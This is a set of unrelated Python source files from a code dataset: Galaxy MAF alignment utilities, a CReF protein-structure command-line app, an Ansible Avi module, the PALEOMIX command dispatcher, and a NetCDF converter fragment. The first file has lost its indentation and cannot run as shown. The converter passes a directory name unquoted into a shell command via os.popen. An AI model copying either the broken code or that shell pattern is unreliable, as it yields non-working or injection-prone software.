print >> sys.stderr, "Fatal Error: %s" % msg
sys.exit()
#an object corresponding to a reference layered alignment
class RegionAlignment( object ):
DNA_COMPLEMENT = string.maketrans( "ACGTacgt", "TGCAtgca" )
MAX_SEQUENCE_SIZE = sys.maxint #Maximum length of sequence allowed
def __init__( self, size, species = [] ):
assert size <= self.MAX_SEQUENCE_SIZE, "Maximum length allowed for an individual sequence has been exceeded (%i > %i)." % ( size, self.MAX_SEQUENCE_SIZE )
self.size = size
self.sequences = {}
if not isinstance( species, list ):
species = [species]
for spec in species:
self.add_species( spec )
#add a species to the alignment
def add_species( self, species ):
#make temporary sequence files
self.sequences[species] = tempfile.TemporaryFile()
self.sequences[species].write( "-" * self.size )
#returns the names for species found in alignment, skipping names as requested
def get_species_names( self, skip = [] ):
if not isinstance( skip, list ): skip = [skip]
names = self.sequences.keys()
for name in skip:
try: names.remove( name )
except: pass
return names
#returns the sequence for a species
def get_sequence( self, species ):
self.sequences[species].seek( 0 )
return self.sequences[species].read()
#returns the reverse complement of the sequence for a species
def get_sequence_reverse_complement( self, species ):
complement = [base for base in self.get_sequence( species ).translate( self.DNA_COMPLEMENT )]
complement.reverse()
return "".join( complement )
#sets a position for a species
def set_position( self, index, species, base ):
if len( base ) != 1: raise Exception( "A genomic position can only have a length of 1." )
return self.set_range( index, species, base )
#sets a range for a species
def set_range( self, index, species, bases ):
if index >= self.size or index < 0: raise Exception( "Your index (%i) is out of range (0 - %i)." % ( index, self.size - 1 ) )
if len( bases ) == 0: raise Exception( "A set of genomic positions can only have a positive length." )
if species not in self.sequences.keys(): self.add_species( species )
self.sequences[species].seek( index )
self.sequences[species].write( bases )
#Flush temp file of specified species, or all species
def flush( self, species = None ):
if species is None:
species = self.sequences.keys()
elif not isinstance( species, list ):
species = [species]
for spec in species:
self.sequences[spec].flush()
class GenomicRegionAlignment( RegionAlignment ):
def __init__( self, start, end, species = [] ):
RegionAlignment.__init__( self, end - start, species )
self.start = start
self.end = end
class SplicedAlignment( object ):
DNA_COMPLEMENT = string.maketrans( "ACGTacgt", "TGCAtgca" )
def __init__( self, exon_starts, exon_ends, species = [] ):
if not isinstance( exon_starts, list ):
exon_starts = [exon_starts]
if not isinstance( exon_ends, list ):
exon_ends = [exon_ends]
        assert len( exon_starts ) == len( exon_ends ), "The number of starts does not match the number of ends."
self.exons = []
for i in range( len( exon_starts ) ):
self.exons.append( GenomicRegionAlignment( exon_starts[i], exon_ends[i], species ) )
#returns the names for species found in alignment, skipping names as requested
def get_species_names( self, skip = [] ):
if not isinstance( skip, list ): skip = [skip]
names = []
for exon in self.exons:
for name in exon.get_species_names( skip = skip ):
if name not in names:
names.append( name )
return names
#returns the sequence for a species
def get_sequence( self, species ):
sequence = tempfile.TemporaryFile()
for exon in self.exons:
if species in exon.get_species_names():
sequence.write( exon.get_sequence( species ) )
else:
sequence.write( "-" * exon.size )
sequence.seek( 0 )
return sequence.read()
#returns the reverse complement of the sequence for a species
def get_sequence_reverse_complement( self, species ):
complement = [base for base in self.get_sequence( species ).translate( self.DNA_COMPLEMENT )]
complement.reverse()
return "".join( complement )
#Start and end of coding region
@property
def start( self ):
return self.exons[0].start
@property
def end( self ):
return self.exons[-1].end
#Open a MAF index using a UID
def maf_index_by_uid( maf_uid, index_location_file ):
for line in open( index_location_file ):
try:
#read each line, if not enough fields, go to next line
if line[0:1] == "#" : continue
fields = line.split('\t')
if maf_uid == fields[1]:
try:
maf_files = fields[4].replace( "\n", "" ).replace( "\r", "" ).split( "," )
return bx.align.maf.MultiIndexed( maf_files, keep_open = True, parse_e_rows = False )
except Exception, e:
raise Exception( 'MAF UID (%s) found, but configuration appears to be malformed: %s' % ( maf_uid, e ) )
except:
pass
return None
#return ( index, temp_index_filename ) for user maf, if available, or build one and return it, return None when no tempfile is created
def open_or_build_maf_index( maf_file, index_filename, species = None ):
try:
return ( bx.align.maf.Indexed( maf_file, index_filename = index_filename, keep_open = True, parse_e_rows = False ), None )
except:
return build_maf_index( maf_file, species = species )
#*** ANY CHANGE TO THIS METHOD HERE OR IN galaxy.datatypes.sequences MUST BE PROPAGATED ***
def build_maf_index_species_chromosomes( filename, index_species = None ):
species = []
species_chromosomes = {}
indexes = bx.interval_index_file.Indexes()
blocks = 0
try:
maf_reader = bx.align.maf.Reader( open( filename ) )
while True:
pos = maf_reader.file.tell()
block = maf_reader.next()
if block is None:
break
blocks += 1
for c in block.components:
spec = c.src
chrom = None
if "." in spec:
spec, chrom = spec.split( ".", 1 )
if spec not in species:
species.append( spec )
species_chromosomes[spec] = []
if chrom and chrom not in species_chromosomes[spec]:
species_chromosomes[spec].append( chrom )
if index_species is None or spec in index_species:
forward_strand_start = c.forward_strand_start
forward_strand_end = c.forward_strand_end
try:
forward_strand_start = int( forward_strand_start )
forward_strand_end = int( forward_strand_end )
except ValueError:
continue #start and end are not integers, can't add component to index, goto next component
#this likely only occurs when parse_e_rows is True?
#could a species exist as only e rows? should the
if forward_strand_end > forward_strand_start:
#require positive length; i.e. certain lines have start = end = 0 and cannot be indexed
indexes.add( c.src, forward_strand_start, forward_strand_end, pos, max=c.src_size )
except Exception, e:
#most likely a bad MAF
log.debug( 'Building MAF index on %s failed: %s' % ( filename, e ) )
        return ( None, [], {}, 0 )
return ( indexes, species, species_chromosomes, blocks )
#builds and returns ( index, index_filename ) for specified maf_file
def build_maf_index( maf_file, species = None ):
indexes, found_species, species_chromosomes, blocks = build_maf_index_species_chromosomes( maf_file, species )
if indexes is not None:
fd, index_filename = tempfile.mkstemp()
out = os.fdopen( fd, 'w' )
indexes.write( out )
out.close()
return ( bx.align.maf.Indexed( maf_file, index_filename = index_filename, keep_open = True, parse_e_rows = False ), index_filename )
return ( None, None )
def component_overlaps_region( c, region ):
if c is None: return False
start, end = c.get_forward_strand_start(), c.get_forward_strand_end()
if region.start >= end or region.end <= start:
return False
return True
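#e.g. a component spanning forward-strand [10, 20) does not overlap region [20, 30),
#since the intervals are half-open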
def chop_block_by_region( block, src, region, species = None, mincols = 0 ):
# This chopping method was designed to maintain consistency with how start/end padding gaps have been working in Galaxy thus far:
# behavior as seen when forcing blocks to be '+' relative to src sequence (ref) and using block.slice_by_component( ref, slice_start, slice_end )
# whether-or-not this is the 'correct' behavior is questionable, but this will at least maintain consistency
# comments welcome
slice_start = block.text_size #max for the min()
slice_end = 0 #min for the max()
old_score = block.score #save old score for later use
    # We no longer assume only one occurrence of src per block, so we need to check them all
for c in iter_components_by_src( block, src ):
if component_overlaps_region( c, region ):
if c.text is not None:
rev_strand = False
if c.strand == "-":
#We want our coord_to_col coordinates to be returned from positive stranded component
rev_strand = True
c = c.reverse_complement()
start = max( region.start, c.start )
end = min( region.end, c.end )
start = c.coord_to_col( start )
end = c.coord_to_col( end )
if rev_strand:
#need to orient slice coordinates to the original block direction
slice_len = end - start
end = len( c.text ) - start
start = end - slice_len
slice_start = min( start, slice_start )
slice_end = max( end, slice_end )
if slice_start < slice_end:
block = block.slice( slice_start, slice_end )
if block.text_size > mincols:
# restore old score, may not be accurate, but it is better than 0 for everything?
block.score = old_score
if species is not None:
block = block.limit_to_species( species )
block.remove_all_gap_columns()
return block
return None
def orient_block_by_region( block, src, region, force_strand = None ):
#loop through components matching src,
#make sure each of these components overlap region
    #cache strand for each of overlapping regions
#if force_strand / region.strand not in strand cache, reverse complement
### we could have 2 sequences with same src, overlapping region, on different strands, this would cause no reverse_complementing
strands = [ c.strand for c in iter_components_by_src( block, src ) if component_overlaps_region( c, region ) ]
if strands and ( force_strand is None and region.strand not in strands ) or ( force_strand is not None and force_strand not in strands ):
block = block.reverse_complement()
return block
def get_oriented_chopped_blocks_for_region( index, src, region, species = None, mincols = 0, force_strand = None ):
for block, idx, offset in get_oriented_chopped_blocks_with_index_offset_for_region( index, src, region, species, mincols, force_strand ):
yield block
def get_oriented_chopped_blocks_with_index_offset_for_region( index, src, region, species = None, mincols = 0, force_strand = None ):
for block, idx, offset in get_chopped_blocks_with_index_offset_for_region( index, src, region, species, mincols ):
yield orient_block_by_region( block, src, region, force_strand ), idx, offset
#split a block with multiple occurrences of src into one block per src
def iter_blocks_split_by_src( block, src ):
for src_c in iter_components_by_src( block, src ):
new_block = bx.align.Alignment( score=block.score, attributes=deepcopy( block.attributes ) )
new_block.text_size = block.text_size
for c in block.components:
if c == src_c or c.src != src:
                new_block.add_component( deepcopy( c ) ) #components have reference to alignment, don't want to lose reference to original alignment block in original components
yield new_block
#split a block into multiple blocks with all combinations of a species appearing only once per block
def iter_blocks_split_by_species( block, species = None ):
def __split_components_by_species( components_by_species, new_block ):
if components_by_species:
#more species with components to add to this block
components_by_species = deepcopy( components_by_species )
spec_comps = components_by_species.pop( 0 )
for c in spec_comps:
newer_block = deepcopy( new_block )
newer_block.add_component( deepcopy( c ) )
for value in __split_components_by_species( components_by_species, newer_block ):
yield value
else:
#no more components to add, yield this block
yield new_block
#divide components by species
spec_dict = {}
if not species:
species = []
for c in block.components:
spec, chrom = src_split( c.src )
if spec not in spec_dict:
spec_dict[ spec ] = []
species.append( spec )
spec_dict[ spec ].append( c )
else:
for spec in species:
spec_dict[ spec ] = []
for c in iter_components_by_src_start( block, spec ):
spec_dict[ spec ].append( c )
empty_block = bx.align.Alignment( score=block.score, attributes=deepcopy( block.attributes ) ) #should we copy attributes?
empty_block.text_size = block.text_size
#call recursive function to split into each combo of spec/blocks
for value in __split_components_by_species( spec_dict.values(), empty_block ):
sort_block_components_by_block( value, block ) #restore original component order
yield value
#generator yielding only chopped and valid blocks for a specified region
def get_chopped_blocks_for_region( index, src, region, species = None, mincols = 0 ):
for block, idx, offset in get_chopped_blocks_with_index_offset_for_region( index, src, region, species, mincols ):
yield block
def get_chopped_blocks_with_index_offset_for_region( index, src, region, species = None, mincols = 0 ):
for block, idx, offset in index.get_as_iterator_with_index_and_offset( src, region.start, region.end ):
block = chop_block_by_region( block, src, region, species, mincols )
if block is not None:
yield block, idx, offset
#returns a filled region alignment for specified regions
def get_region_alignment( index, primary_species, chrom, start, end, strand = '+', species = None, mincols = 0, overwrite_with_gaps = True ):
if species is not None: alignment = RegionAlignment( end - start, species )
else: alignment = RegionAlignment( end - start, primary_species )
return fill_region_alignment( alignment, index, primary_species, chrom, start, end, strand, species, mincols, overwrite_with_gaps )
#reduces a block to only positions existing in the src provided
def reduce_block_by_primary_genome( block, species, chromosome, region_start ):
    #returns ( start_offset, {species: texts} )
    #where texts' contents are reduced to only positions existing in the primary genome
src = "%s.%s" % ( species, chromosome )
ref = block.get_component_by_src( src )
start_offset = ref.start - region_start
species_texts = {}
for c in block.components:
species_texts[ c.src.split( '.' )[0] ] = list( c.text )
#remove locations which are gaps in the primary species, starting from the downstream end
for i in range( len( species_texts[ species ] ) - 1, -1, -1 ):
if species_texts[ species ][i] == '-':
for text in species_texts.values():
text.pop( i )
for spec, text in species_texts.items():
species_texts[spec] = ''.join( text )
return ( start_offset, species_texts )
#fills a region alignment
def fill_region_alignment( alignment, index, primary_species, chrom, start, end, strand = '+', species = None, mincols = 0, overwrite_with_gaps = True ):
region = bx.intervals.Interval( start, end )
region.chrom = chrom
region.strand = strand
primary_src = "%s.%s" % ( primary_species, chrom )
    #Order blocks overlapping this position by score, lowest first
blocks = []
for block, idx, offset in index.get_as_iterator_with_index_and_offset( primary_src, start, end ):
score = float( block.score )
for i in range( 0, len( blocks ) ):
if score < blocks[i][0]:
blocks.insert( i, ( score, idx, offset ) )
break
else:
blocks.append( ( score, idx, offset ) )
#gap_chars_tuple = tuple( GAP_CHARS )
gap_chars_str = ''.join( GAP_CHARS )
#Loop through ordered blocks and layer by increasing score
for block_dict in blocks:
        for block in iter_blocks_split_by_species( block_dict[1].get_at_offset( block_dict[2] ) ): #need to handle each occurrence of sequence in block separately
if component_overlaps_region( block.get_component_by_src( primary_src ), region ):
block = chop_block_by_region( block, primary_src, region, species, mincols ) #chop block
block = orient_block_by_region( block, primary_src, region ) #orient block
start_offset, species_texts = reduce_block_by_primary_genome( block, primary_species, chrom, start )
for spec, text in species_texts.items():
#we should trim gaps from both sides, since these are not positions in this species genome (sequence)
text = text.rstrip( gap_chars_str )
gap_offset = 0
while True in [ text.startswith( gap_char ) for gap_char in GAP_CHARS ]: #python2.4 doesn't accept a tuple for .startswith()
#while text.startswith( gap_chars_tuple ):
gap_offset += 1
text = text[1:]
if not text:
break
if text:
if overwrite_with_gaps:
alignment.set_range( start_offset + gap_offset, spec, text )
else:
for i, char in enumerate( text ):
if char not in GAP_CHARS:
alignment.set_position( start_offset + gap_offset + i, spec, char )
return alignment
#returns a filled spliced region alignment for specified region with start and end lists
def get_spliced_region_alignment( index, primary_species, chrom, starts, ends, strand = '+', species = None, mincols = 0, overwrite_with_gaps = True ):
#create spliced alignment object
if species is not None: alignment = SplicedAlignment( starts, ends, species )
else: alignment = SplicedAlignment( starts, ends, [primary_species] )
for exon in alignment.exons:
fill_region_alignment( exon, index, primary_species, chrom, exon.start, exon.end, strand, species, mincols, overwrite_with_gaps )
return alignment
#loop through string array, only return non-commented lines
def line_enumerator( lines, comment_start = '#' ):
i = 0
for line in lines:
if not line.startswith( comment_start ):
i += 1
yield ( i, line )
#read a GeneBed file, return list of starts, ends, raw fields
def get_starts_ends_fields_from_gene_bed( line ):
#Starts and ends for exons
starts = []
ends = []
fields = line.split()
    #Requires at least 12 BED columns
if len(fields) < 12:
raise Exception( "Not a proper 12 column BED line (%s)." % line )
chrom = fields[0]
tx_start = int( fields[1] )
tx_end = int( fields[2] )
name = fields[3]
strand = fields[5]
if strand != '-': strand='+' #Default strand is +
cds_start = int( fields[6] )
cds_end = int( fields[7] )
#Calculate and store starts and ends of coding exons
region_start, region_end = cds_start, cds_end
exon_starts = map( int, fields[11].rstrip( ',\n' ).split( ',' ) )
exon_starts = map( ( lambda x: x + tx_start ), exon_starts )
exon_ends = map( int, fields[10].rstrip( ',' ).split( ',' ) )
    exon_ends = map( ( lambda x, y: x + y ), exon_starts, exon_ends )
for start, end in zip( exon_starts, exon_ends ):
start = max( start, region_start )
end = min( end, region_end )
if start < end:
starts.append( start )
ends.append( end )
return ( starts, ends, fields )
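#e.g. for the (hypothetical) 12 column BED line
#  chr1 100 900 gene1 0 + 150 850 0 2 200,300 0,500
#the coding exon ( starts, ends ) are ( [150, 600], [300, 850] )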
def iter_components_by_src( block, src ):
for c in block.components:
if c.src == src:
yield c
def get_components_by_src( block, src ):
return [ value for value in iter_components_by_src( block, src ) ]
def iter_components_by_src_start( block, src ):
for c in block.components:
if c.src.startswith( src ):
yield c
def get_components_by_src_start( block, src ):
return [ value for value in iter_components_by_src_start( block, src ) ]
def sort_block_components_by_block( block1, block2 ):
#orders the components in block1 by the index of the component in block2
#block1 must be a subset of block2
#occurs in-place
return block1.components.sort( cmp = lambda x, y: block2.components.index( x ) - block2.components.index( y ) )
def get_species_in_maf( maf_filename ):
species = []
for block in bx.align.maf.Reader( open( maf_filename ) ):
for spec in get_species_in_block( block ):
if spec not in species:
species.append( spec )
return species
def parse_species_option( species ):
if species:
species = species.split( ',' )
if 'None' not in species:
return species
return None #provided species was '', None, or had 'None' in it
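#e.g. parse_species_option( 'hg18,mm9' ) -> [ 'hg18', 'mm9' ]; parse_species_option( '' ) -> None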
def remove_temp_index_file( index_filename ):
try: os.unlink( index_filename )
except: pass
#Below are methods to deal with FASTA files
def get_fasta_header( component, attributes = {}, suffix = None ):
header = ">%s(%s):%i-%i|" % ( component.src, component.strand, component.get_forward_strand_start(), component.get_forward_strand_end() )
for key, value in attributes.iteritems():
header = "%s%s=%s|" % ( header, key, value )
if suffix:
header = "%s%s" % ( header, suffix )
else:
header = "%s%s" % ( header, src_split( component.src )[ 0 ] )
return header
def get_attributes_from_fasta_header( header ):
if not header: return {}
attributes = {}
header = header.lstrip( '>' )
header = header.strip()
fields = header.split( '|' )
try:
region = fields[0]
region = region.split( '(', 1 )
temp = region[0].split( '.', 1 )
attributes['species'] = temp[0]
if len( temp ) == 2:
attributes['chrom'] = temp[1]
else:
attributes['chrom'] = temp[0]
region = region[1].split( ')', 1 )
attributes['strand'] = region[0]
region = region[1].lstrip( ':' ).split( '-' )
attributes['start'] = int( region[0] )
attributes['end'] = int( region[1] )
except:
#fields 0 is not a region coordinate
pass
if len( fields ) > 2:
for i in xrange( 1, len( fields ) - 1 ):
prop = fields[i].split( '=', 1 )
if len( prop ) == 2:
attributes[ prop[0] ] = prop[1]
if len( fields ) > 1:
attributes['__suffix__'] = fields[-1]
return attributes
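#e.g. '>hg18.chr1(+):100-200|score=1|hg18' yields
#{ 'species': 'hg18', 'chrom': 'chr1', 'strand': '+', 'start': 100, 'end': 200, 'score': '1', '__suffix__': 'hg18' }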
def iter_fasta_alignment( filename ):
class fastaComponent:
def __init__( self, species, text = "" ):
self.species = species
self.text = text
def extend( self, text ):
self.text = self.text + text.replace( '\n', '' ).replace( '\r', '' ).strip()
#yields a list of fastaComponents for a FASTA file
f = open( filename, 'rb' )
components = []
#cur_component = None
while True:
line = f.readline()
if not line:
if components:
yield components
return
line = line.strip()
if not line:
if components:
yield components
components = []
elif line.startswith( '>' ):
attributes = get_attributes_from_fasta_header( line )
components.append( fastaComponent( attributes['species'] ) )
elif components:
components[-1].extend( line )
|
volpino/Yeps-EURAC
|
lib/galaxy/tools/util/maf_utilities.py
|
Python
|
mit
| 27,158
|
[
"Galaxy"
] |
348f1820f9e02b492e1b53b3f7e72259fed413610ae0c4c3da96659162513f1a
|
#!/usr/bin/env python
import os
import argparse
import logging
import importlib
import tempfile
import subprocess
import pandas
from Bio import SeqIO
from cref.app import BaseApp
from cref.libs import rcsb
logger = logging.getLogger('CReF')
class TerminalApp(BaseApp):
"""
App to be run on the terminal
"""
def reporter(self, state):
pass
def run_cref(aa_sequence, output_dir, params):
pandas.set_option('display.max_columns', 0)
pandas.set_option('display.max_rows', 5)
if not os.path.isdir(output_dir):
os.makedirs(output_dir)
app = TerminalApp(params)
return app.run(aa_sequence, output_dir)
def configure_logger(log_level='INFO', include_pathname=False):
    logger = logging.getLogger('CReF')
    level = getattr(logging, log_level.upper(), None)
    if not isinstance(level, int):
        raise ValueError('Invalid log level: %s' % log_level)
    logger.propagate = False
    logger.setLevel(level)
ch = logging.StreamHandler()
ch.setLevel(level)
if include_pathname:
template = ('%(asctime)s - %(name)s - %(levelname)s'
'(%(pathname)s, %(lineno)d)- %(message)s')
else:
template = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
formatter = logging.Formatter(template, datefmt='%d/%m/%Y %I:%M:%S %p')
ch.setFormatter(formatter)
logger.addHandler(ch)
def parse_args():
parser = argparse.ArgumentParser(
description='CReF: Protein structure prediction')
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument(
'--sequence', dest='sequence',
help='Aminoacid sequence using one letter code',
)
group.add_argument(
'--fasta', dest='fasta',
help='File containing the fasta sequence',
)
group.add_argument(
'--pdb', dest='pdb',
help='PDB Code from where the sequence will be extracted',
)
parser.add_argument(
'--config', dest='config',
help='File specifying the configurations'
)
parser.add_argument(
'--output', dest='output_dir',
default='predictions/tmp',
help='Directory to save the results'
)
parser.add_argument(
'--log', dest='log_level',
default='INFO',
help='Log level to be used (DEBUG, INFO, WARN, ERROR)'
)
parser.add_argument(
'--pymol', dest='pymol', action='store_true',
help='View prediction in PyMOL'
)
return parser.parse_args()
def read_fasta(filepath):
records = []
with open(filepath, 'rU') as fasta_file:
records = list(SeqIO.parse(fasta_file, 'fasta'))
return records
def predict_fasta(filepath, output_dir, params):
sequences = read_fasta(filepath)
output_filepaths = []
for sequence in sequences:
seq = str(sequence.seq).replace('X', '')
        # use a per-sequence directory without reassigning output_dir,
        # so later sequences are not nested inside earlier ones
        seq_output_dir = os.path.join(output_dir, sequence.id.split(':')[0] + '/')
        output = run_cref(seq, seq_output_dir, params)
        sequence_file = os.path.join(seq_output_dir, 'sequence.txt')
with open(sequence_file, 'w') as sequence_output:
sequence_output.write(seq)
output_filepaths.append(output)
return output_filepaths
def read_config(module):
try:
config = importlib.import_module(module)
except Exception as e:
logger.error(e)
raise Exception('Invalid config file')
return config
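# a module passed via --config is expected to expose a `params` dict,
# e.g. a hypothetical my_config.py containing:
#
#   params = {'fragment_size': 5}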
def run_pymol(pdb_code, predicted_filepath):
filepath = os.path.join(
os.path.dirname(predicted_filepath),
'experimental_structure.pdb'
)
experimental_pdb = rcsb.download_pdb(pdb_code, filepath)
subprocess.call([
'pymol',
predicted_filepath,
experimental_pdb,
'-r',
'cref/utils/pymol.py'
])
def main():
params = {}
args = parse_args()
configure_logger(args.log_level)
if args.config:
config = read_config(args.config)
params = config.params
# Sequence input
if args.sequence:
run_cref(args.sequence, args.output_dir, params)
# Fasta file input
elif args.fasta:
predict_fasta(args.fasta, args.output_dir, params)
# PDB code input
elif args.pdb:
handler, fasta_file = tempfile.mkstemp(suffix='.fasta', prefix='tmp')
rcsb.download_fasta(args.pdb, fasta_file)
params['pdb'] = args.pdb
output_files = predict_fasta(fasta_file, args.output_dir, params)
os.remove(fasta_file)
if args.pymol:
run_pymol(args.pdb, output_files[0])
else:
raise ValueError('You must specify a sequence, fasta file or pdb code')
if __name__ == '__main__':
main()
|
mchelem/cref2
|
cref/app/terminal.py
|
Python
|
mit
| 4,737
|
[
"PyMOL"
] |
186f38ec15ade06b82bcc6ac837bf46e22481607cd669bffcdcd8b3632ae10c0
|
#!/usr/bin/python
#
# Created on Aug 25, 2016
# @author: Gaurav Rastogi (grastogi@avinetworks.com)
# Eric Anderson (eanderson@avinetworks.com)
# module_check: supported
#
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: avi_microservicegroup
author: Gaurav Rastogi (grastogi@avinetworks.com)
short_description: Module for setup of MicroServiceGroup Avi RESTful Object
description:
- This module is used to configure MicroServiceGroup object
- more examples at U(https://github.com/avinetworks/devops)
requirements: [ avisdk ]
version_added: "2.4"
options:
state:
description:
- The state that should be applied on the entity.
default: present
choices: ["absent","present"]
created_by:
description:
- Creator name.
description:
description:
- User defined description for the object.
name:
description:
- Name of the microservice group.
required: true
service_refs:
description:
- Configure microservice(es).
- It is a reference to an object of type microservice.
tenant_ref:
description:
- It is a reference to an object of type tenant.
url:
description:
- Avi controller URL of the object.
uuid:
description:
- Uuid of the microservice group.
extends_documentation_fragment:
- avi
'''
EXAMPLES = '''
- name: Create a Microservice Group that can be used for setting up Network security policy
avi_microservicegroup:
controller: ''
username: ''
password: ''
description: Group created by my Secure My App UI.
name: vs-msg-marketing
tenant_ref: admin
'''
RETURN = '''
obj:
description: MicroServiceGroup (api/microservicegroup) object
returned: success, changed
type: dict
'''
from ansible.module_utils.basic import AnsibleModule
try:
from ansible.module_utils.network.avi.avi import (
avi_common_argument_spec, HAS_AVI, avi_ansible_api)
except ImportError:
HAS_AVI = False
def main():
argument_specs = dict(
state=dict(default='present',
choices=['absent', 'present']),
created_by=dict(type='str',),
description=dict(type='str',),
name=dict(type='str', required=True),
service_refs=dict(type='list',),
tenant_ref=dict(type='str',),
url=dict(type='str',),
uuid=dict(type='str',),
)
argument_specs.update(avi_common_argument_spec())
module = AnsibleModule(
argument_spec=argument_specs, supports_check_mode=True)
if not HAS_AVI:
return module.fail_json(msg=(
'Avi python API SDK (avisdk>=17.1) is not installed. '
'For more details visit https://github.com/avinetworks/sdk.'))
return avi_ansible_api(module, 'microservicegroup',
set([]))
if __name__ == '__main__':
main()
|
Azulinho/ansible
|
lib/ansible/modules/network/avi/avi_microservicegroup.py
|
Python
|
gpl-3.0
| 3,753
|
[
"VisIt"
] |
504d92c0d4ef423c197c1773d61216dc79dc53388bea664c9f56fbd622f11ba7
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Copyright (c) 2014 Mikkel Schubert <MikkelSch@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import logging
import sys
import pysam
import paleomix
import paleomix.common.system
import paleomix.common.logging
_COMMANDS = {
# CMBR NGS pipeline
"ngs": "paleomix.pipelines.ngs",
"ngs:finalize_bam": "paleomix.pipelines.ngs.tools.finalize_bam",
# BAM/FASTQ pipeline
"bam": "paleomix.pipelines.bam.main",
"bam_pipeline": "paleomix.pipelines.bam.main",
"trim": "paleomix.pipelines.bam.trim_pipeline",
"trim_pipeline": "paleomix.pipelines.bam.trim_pipeline",
"worker": "paleomix.tools.worker",
# Phylogenetic pipeline
"phylo": "paleomix.pipelines.phylo.pipeline",
"phylo_pipeline": "paleomix.pipelines.phylo.pipeline",
# Zonkey
"zonkey": "paleomix.pipelines.zonkey.pipeline",
"zonkey:db": "paleomix.pipelines.zonkey.build_db",
"zonkey:mito": "paleomix.pipelines.zonkey.build_mito",
"zonkey:tped": "paleomix.pipelines.zonkey.build_tped",
# BAM file tools
"cleanup": "paleomix.tools.cleanup",
"coverage": "paleomix.tools.coverage",
"depths": "paleomix.tools.depths",
"dupcheck": "paleomix.tools.dupcheck",
# VCF/etc. tools
"rmdup_collapsed": "paleomix.tools.rmdup_collapsed",
"vcf_filter": "paleomix.tools.vcf_filter",
"vcf_to_fasta": "paleomix.tools.vcf_to_fasta",
# Misc tools
":bedtools": "paleomix.tools.bedtools",
":validate_fastq": "paleomix.tools.validate_fastq",
":validate_fasta": "paleomix.tools.validate_fasta",
}
_HELP = """PALEOMIX - pipelines and tools for NGS data analyses
Version: {version}
Pipelines:
paleomix bam -- Pipeline for trimming and mapping of NGS reads.
paleomix trim -- Equivalent to the 'bam' pipeline, but only runs
the FASTQ trimming steps.
paleomix phylo -- Pipeline for genotyping and phylogenetic
inference from BAMs.
paleomix zonkey -- Pipeline for detecting F1 (equine) hybrids.
paleomix worker -- Distribute pipelines across multiple systems.
BAM/SAM tools:
paleomix coverage -- Calculate coverage across reference sequences
or regions of interest.
paleomix depths -- Calculate depth histograms across reference
sequences or regions of interest.
paleomix rmdup_collapsed -- Filters PCR duplicates for collapsed paired-
                              end reads generated by the AdapterRemoval
tool.
VCF/GTF/BED/Pileup tools:
paleomix vcf_filter -- Quality filters for VCF records, similar to
'vcfutils.pl varFilter'.
paleomix vcf_to_fasta -- Create most likely FASTA sequence from tabix-
indexed VCF file.
If you make use of PALEOMIX in your work, please cite
Schubert et al, "Characterization of ancient and modern genomes by SNP
detection and phylogenomic and metagenomic analysis using PALEOMIX".
Nature Protocols. 2014 May; 9(5): 1056-82. doi: 10.1038/nprot.2014.063
"""
def main(argv):
# Change process name from 'python' to 'paleomix'
paleomix.common.system.set_procname("paleomix " + " ".join(argv[:1]))
# Setup basic logging to STDERR
paleomix.common.logging.initialize_console_logging()
# Silence log-messages from HTSLIB
pysam.set_verbosity(0)
if not argv or argv[0] in ("-h", "--help", "help"):
print(_HELP.format(version=paleomix.__version__))
return 0
elif argv[0] in ("--version",):
print("paleomix v{}".format(paleomix.__version__))
return 0
command = _COMMANDS.get(argv[0])
if command is None:
log = logging.getLogger(__name__)
log.error("Unknown command %r", argv[0])
return 1
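    # Dispatch dynamically: e.g. "paleomix bam ..." maps to the module
    # "paleomix.pipelines.bam.main", which is imported here and has its
    # main() invoked with the remaining command-line arguments.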
module = __import__(command, fromlist=["main"])
return module.main(argv[1:])
def entry_point():
return main(sys.argv[1:])
if __name__ == "__main__":
sys.exit(main(sys.argv[1:]))
|
MikkelSchubert/paleomix
|
paleomix/main.py
|
Python
|
mit
| 5,185
|
[
"pysam"
] |
9ba7395cc04df74cd57859e6155eaab23a98ba01e317a88e3b8d669d6ff6ef68
|
"""
Generates a PostView file from a .nc file. The three methods are for three of the
types of coordinate system used in NetCDFs: lat-lon, x-y, and x/y start/stop with x/y step.
"""
import os
from numpy import *
from time import gmtime, strftime
import datetime
from Scientific.IO import NetCDF
class UnsupportedRasterVariableError(Exception):
    def __init__(self, variableNames):
        print 'file variables', variableNames, 'not supported'
class converter(): #appears to be writing pos files correctly
def wholeDirect( self, direc ):
posTime = datetime.datetime.now()
print 'Started :'+str(strftime("%Y-%m-%d %H:%M:%S", gmtime()))
ncfiles = os.popen("echo "+str(direc)+'*.nc').read().split()
for f in ncfiles:
self.singleNetCDFLayerFileName = f
self.postviewFileName = f[:-2]+'pos'
print self.singleNetCDFLayerFileName
print str(strftime("%Y-%m-%d %H:%M:%S", gmtime()))
try:#note not the most efficient way of calling this
self.writePosFile()
            except Exception:
print 'Failed to write'
continue
